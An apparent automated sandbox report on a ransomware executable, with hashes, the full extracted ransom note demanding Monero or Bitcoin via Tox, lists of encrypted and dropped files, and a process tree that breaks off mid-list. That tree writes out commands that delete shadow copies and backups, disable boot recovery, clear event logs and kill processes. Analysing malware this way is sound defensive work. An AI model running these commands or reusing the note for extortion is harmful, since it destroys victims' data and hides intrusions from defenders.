0b341939797aa4b9ed2f734a16ddc6fb3a4b11fddd98b5ced4e4fc1e54fa2f76

Analysis

max time kernel
11s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
13/02/2024, 20:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
Size

2.2MB
MD5

0608c64c57dcc09246be00f0b2767e6e
SHA1

02642663bfc7be0c06051f4b01c9861102c71850
SHA256

0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985
SHA512

1c61fa21fd94c58349e8c2713828fa807bf44a3a00054cd1a11ab46ec74df4f0be00db245f4cce844b72bf8181e6c636490726ddc4f9d6211469429429ddb138
SSDEEP

24576:Hle0XU/NWp6jCcuYTQn095MmQdg4M/YJFweQDfj0OL2wwU+T8nQl/skT9Fs1g0jv:HiG2ekwA1e7i49vZGqsCz9/47Evz1z1

Score

10^/10

evasion ransomware

Malware Config

Extracted

Path

C:\Program Files\Common Files\README_TO_DECRYPT.txt

Ransom Note

Your network has been compromised! All your important data has been encrypted! There is only one way to get your data back to normal: 1. Contact us as soon as possible to avoid damages and losses from your business. 2. Send to us any encrypted file of your choice and your personal key. 3. We will decrypt 1 file for test (maximum file size = 1 MB), its guaranteed that we can decrypt your files. 4. Pay the amount required in order to restore your network back to normal. 5. We will then send you our software to decrypt and will guide you through the whole restoration of your network. We prefer Monero (XMR) - FIXED PRICE We accept Bitcoin (BTC) - 20% extra of total payment! ============================================================================================================================ WARNING! Do not rename encrypted data. Do not try to decrypt using third party software, it may cause permanent data loss not being able to recover. ============================================================================================================================ Contact information: In order to contact us, download with the following software: https://qtox.github.io or https://tox.chat/download.html Then just add us in TOX: D27A7B3711CD1442A8FAC19BB5780FF291101F6286A62AD21E5F7F08BD5F5F1B9803AAC6ECF9 ============================================================================================================================ Your personal id: 5253413d30613733346632663838396530363236373730623638653434363761613734633a333936396164626339343537306634653537363238646138363435653966356235636635373363616466633362653137336338336238316633613231376132643034623163636238323832633966373665346335663330646339323132633863363262616536366639313262623264623264366138313236323036393434656130306237356465353238323538653266333539396538393439623965663233636633613230623964353638373862373630353366643339653761336239383561613534303465383736383461313165646663623331643131643630626630396561386663396465393332343464623232323837346163623363336332333633653732383937333034636636643163363136666536323731626161313663326337313933633262636339366335646235303737643735373063373966346264616538623638356337326436653037346136616366353364373638656435643535303736343537303265323139343830353066323433343061666236316466653335383337376237366663386630623735633031313932376266666239613534353863326565663462343738333365323533386335346164373931303262346163666236373936343162643565333064666434613633363036326465643866623238303961353364356538643862316161343362393539623239363865326366613830376337386434623066623832616137643762636161356134346264353461333234353231346163376165346363326366326165346266643930326131633538376163386433633435633765333031356332643039333830633339356634366437626264623237356462303536383439636130373539613730353361613561383431316133653563303431373138666537353762613666336264353835373437653439376465616636336336663065643563633661633531613935663432663664306237336364313763323034386533623936333161653630633063363734333935343265623734323433666261643430316261393964363830323832643564646666326665626238303532343330323439326465383132303966616530343331373366326537633039313831353231626139316434656263633361653135326436623162386162346566646139376434636230353533663036613862323230306233366539653337336331376635363166643934346663326631356338656362353562313035646665663264666635353664383064663366376237613334313734346138313834313533313233396531353438623338313434373161646161623132356135626663646338633832383535313039376263663636636432343337663732353361633532663630313235643431373134616437346230326231383a36303863376330623464633732663532366162303263353132396331623337653936316135366632316437353939653938343939353138313335386166653233333434366231633263393466383633613832333332616439363131303764343166613866646130326530303063393262363439383666323565376366363437626361616564396238613636663162303733633634613362326562363239663137313639666265666236396535373136306163336530623662623664643762383764383736336539646465373636336435326539643737316531353264363732373431326139656463376636663039373763313636353434643131663738663537313635666638326163393461643931346639333534656466363562376330646161653966323133643134323764323565666531313832616338376132666234326661353839396634333130386262663630636136303433313530346430353632316635633738313031396361643661623966303732306630646538653533333764346631323761653264613664376231393230383437313633363436616134383030376432346639376530333939316562306436646361626630373738303863646261663834313432633665646137383434663136316636663836666265386637363635623866666132343465636238323939633539396231313831353665633461383935323532376236363438306362383632396434373736643936343161313030643330316463636333633965326265326337333235373538363461353238393632303836353134386636326134376131633835643864333965343136666438373234396261343030336239333037646263633763653839666563396165623562323964346630623161343932633134636263333761653039646564383836656632663939646161353062373433343061623932666639663164376436336136626439623362653166613135643763626535366338323335323734336564633165313161666665666163653532653130633939336439316366333135333932306462393838363137343039346163393638376161343532366638343462333061663031363561396537363437353362333666353437303164333732373262663731353064613236643238316531653133303661623631613462613963336262616438626338353731306238333138346436313334346433313039333134613735646133653937663039336435373030303537376639353864353437623332343465656538633439643037643836386439393739333633333862316166316266653930656266313734663532626232666366363935646531363062306636623535616363363635386532353461306238323430633635383163383131366631

URLs

https://qtox.github.io

https://tox.chat/download.html

Signatures

Clears Windows event logs 1 TTPs 6 IoCs

evasion ransomware

Indicator Removal

T1070

pid	Process
836	wevtutil.exe
2468	wevtutil.exe
2576	wevtutil.exe
3584	wevtutil.exe
2808	wevtutil.exe
1844	wevtutil.exe

Renames multiple (119) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\FrequentOfficeUpdateSchedule.xml	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sk.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\de-DE\msadcor.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\microsoft shared\VSTO\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msado21.tlb	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\System\ado\de-DE\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\ado\ja-JP\msader15.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msadox28.tlb	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\System\msadc\en-US\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\System\Ole DB\en-US\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\microsoft shared\Triedit\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\System\fr-FR\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\fr-FR\wab32res.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-tw.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\microsoft shared\TextConv\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\7-Zip\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ast.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\vi.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\it-IT\sqloledb.rll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\System\en-US\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\de-DE\msadcer.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kab.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sl.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\de-DE\wab32res.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\adcvbs.inc	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\msinfo32.exe.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sv.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\yo.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\DESIGNER\MSADDNDR.OLB	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\System\ado\es-ES\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\es-ES\wab32res.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pl.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lij.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\en-US\msdaremr.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\fr-FR\msdaremr.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\it-IT\msdaprsr.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\System\msadc\es-ES\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\es-ES\msdaremr.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\it-IT\msadcer.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\de-DE\msaddsr.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\microsoft shared\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nl.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
3604	Process not Found
3376	Process not Found
3868	Process not Found
1728	Process not Found
4272	taskkill.exe
1296	taskkill.exe
3292	Process not Found
1844	taskkill.exe
4436	Process not Found
4272	taskkill.exe
3292	Process not Found
796	Process not Found
1912	Process not Found
4496	Process not Found
4384	Process not Found
4296	taskkill.exe
4028	taskkill.exe
4200	Process not Found
4572	Process not Found
460	Process not Found
2656	taskkill.exe
4236	Process not Found
5068	taskkill.exe
3524	Process not Found
3152	Process not Found
2904	Process not Found
4744	taskkill.exe
4964	taskkill.exe
2560	Process not Found
4772	Process not Found
2364	Process not Found
2960	Process not Found
2572	taskkill.exe
2052	taskkill.exe
1484	Process not Found
3224	Process not Found
4332	Process not Found
880	Process not Found
3520	taskkill.exe
3520	Process not Found
3004	Process not Found
3872	taskkill.exe
1164	Process not Found
4436	Process not Found
2988	Process not Found
4524	Process not Found
3676	Process not Found
3912	Process not Found
4984	Process not Found
3376	Process not Found
3832	Process not Found
3012	taskkill.exe
4592	taskkill.exe
1780	Process not Found
3292	Process not Found
1752	Process not Found
3872	Process not Found
1644	Process not Found
844	Process not Found
1108	Process not Found
2336	taskkill.exe
3256	Process not Found
2344	Process not Found
1932	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4696	Process not Found
4696	Process not Found
4696	Process not Found
5020	powershell.exe
5020	powershell.exe
4508	powershell.exe
4508	powershell.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeSecurityPrivilege	836	wevtutil.exe
Token: SeBackupPrivilege	836	wevtutil.exe
Token: SeSecurityPrivilege	2468	taskkill.exe
Token: SeBackupPrivilege	2468	taskkill.exe
Token: SeSecurityPrivilege	2576	wevtutil.exe
Token: SeBackupPrivilege	2576	wevtutil.exe
Token: SeDebugPrivilege	4444	net.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	4192	taskkill.exe
Token: SeDebugPrivilege	2160	taskkill.exe
Token: SeDebugPrivilege	4912	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	2516	taskkill.exe
Token: SeDebugPrivilege	4164	taskkill.exe
Token: SeDebugPrivilege	2468	taskkill.exe
Token: SeDebugPrivilege	4484	net1.exe
Token: SeDebugPrivilege	3412	taskkill.exe
Token: SeSecurityPrivilege	3584	taskkill.exe
Token: SeBackupPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	448	taskkill.exe
Token: SeSecurityPrivilege	2808	Process not Found
Token: SeBackupPrivilege	2808	Process not Found
Token: SeDebugPrivilege	4028	Process not Found
Token: SeSecurityPrivilege	1844	Process not Found
Token: SeBackupPrivilege	1844	Process not Found
Token: SeDebugPrivilege	4696	Process not Found
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3728 wrote to memory of 1212	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	175
PID 3728 wrote to memory of 1212	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	175
PID 3728 wrote to memory of 1212	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	175
PID 3728 wrote to memory of 2744	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	85
PID 3728 wrote to memory of 2744	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	85
PID 3728 wrote to memory of 2744	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	85
PID 3728 wrote to memory of 1332	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	203
PID 3728 wrote to memory of 1332	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	203
PID 3728 wrote to memory of 1332	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	203
PID 3728 wrote to memory of 1848	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	86
PID 3728 wrote to memory of 1848	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	86
PID 3728 wrote to memory of 1848	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	86
PID 3728 wrote to memory of 3548	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	88
PID 3728 wrote to memory of 3548	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	88
PID 3728 wrote to memory of 3548	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	88
PID 3728 wrote to memory of 3972	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	89
PID 3728 wrote to memory of 3972	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	89
PID 3728 wrote to memory of 3972	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	89
PID 3728 wrote to memory of 448	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	219
PID 3728 wrote to memory of 448	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	219
PID 3728 wrote to memory of 448	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	219
PID 1848 wrote to memory of 836	1848	cmd.exe	96
PID 1848 wrote to memory of 836	1848	cmd.exe	96
PID 1848 wrote to memory of 836	1848	cmd.exe	96
PID 3548 wrote to memory of 2468	3548	cmd.exe	162
PID 3548 wrote to memory of 2468	3548	cmd.exe	162
PID 3548 wrote to memory of 2468	3548	cmd.exe	162
PID 3728 wrote to memory of 4360	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	91
PID 3728 wrote to memory of 4360	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	91
PID 3728 wrote to memory of 4360	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	91
PID 3728 wrote to memory of 2656	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	92
PID 3728 wrote to memory of 2656	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	92
PID 3728 wrote to memory of 2656	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	92
PID 3728 wrote to memory of 3272	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	93
PID 3728 wrote to memory of 3272	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	93
PID 3728 wrote to memory of 3272	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	93
PID 3728 wrote to memory of 4648	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	94
PID 3728 wrote to memory of 4648	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	94
PID 3728 wrote to memory of 4648	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	94
PID 3728 wrote to memory of 4636	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	95
PID 3728 wrote to memory of 4636	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	95
PID 3728 wrote to memory of 4636	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	95
PID 3272 wrote to memory of 2576	3272	cmd.exe	120
PID 3272 wrote to memory of 2576	3272	cmd.exe	120
PID 3272 wrote to memory of 2576	3272	cmd.exe	120
PID 3728 wrote to memory of 2872	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	98
PID 3728 wrote to memory of 2872	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	98
PID 3728 wrote to memory of 2872	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	98
PID 3728 wrote to memory of 1844	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	226
PID 3728 wrote to memory of 1844	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	226
PID 3728 wrote to memory of 1844	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	226
PID 3728 wrote to memory of 2676	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	100
PID 3728 wrote to memory of 2676	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	100
PID 3728 wrote to memory of 2676	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	100
PID 3728 wrote to memory of 2624	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	188
PID 3728 wrote to memory of 2624	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	188
PID 3728 wrote to memory of 2624	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	188
PID 3728 wrote to memory of 2820	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	103
PID 3728 wrote to memory of 2820	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	103
PID 3728 wrote to memory of 2820	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	103
PID 3728 wrote to memory of 2076	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	102
PID 3728 wrote to memory of 2076	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	102
PID 3728 wrote to memory of 2076	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	102
PID 3728 wrote to memory of 2788	3728	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	104

C:\Users\Admin\AppData\Local\Temp\0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
"C:\Users\Admin\AppData\Local\Temp\0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin delete shadows /all /quiet"
  2⤵
  PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest"
  2⤵
  PID:2744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "wevtutil cl securit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1848
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil cl securit
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=Z: /on=C: /maxsize=401MB"
  2⤵
  PID:1212
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "wevtutil cl application"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3548
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil cl application
    3⤵
    - Clears Windows event logs
    PID:2468
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
  2⤵
  PID:3972
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "wbadmin delete catalog -quiet"
  2⤵
  PID:448
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "wbadmin DELETE SYSTEMSTATEBACKUP"
  2⤵
  PID:4360
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "bcdedit /set {default} recoveryenabled No"
  2⤵
  PID:2656
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "wevtutil cl system"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3272
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil cl system
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:2576
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=A: /on=C: /maxsize=401MB"
  2⤵
  PID:4648
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=B: /on=C: /maxsize=401MB"
  2⤵
  PID:4636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"
  2⤵
  PID:2872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im AOTAgent.exe"
  2⤵
  PID:1844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im AOTAgent.exe
    3⤵
    PID:4444
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im iVPAgent.exe"
  2⤵
  PID:2676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im iVPAgent.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=D: /on=C: /maxsize=401MB"
  2⤵
  PID:2624
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im CETASvc.exe"
  2⤵
  PID:2076
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im CETASvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=E: /on=C: /maxsize=401MB"
  2⤵
  PID:2820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=F: /on=C: /maxsize=401MB"
  2⤵
  PID:2788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "taskkill /f /im powerpnt.exe"
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im powerpnt.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2160
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "vssadmin resize shadowstorage /for=G: /on=C: /maxsize=401MB"
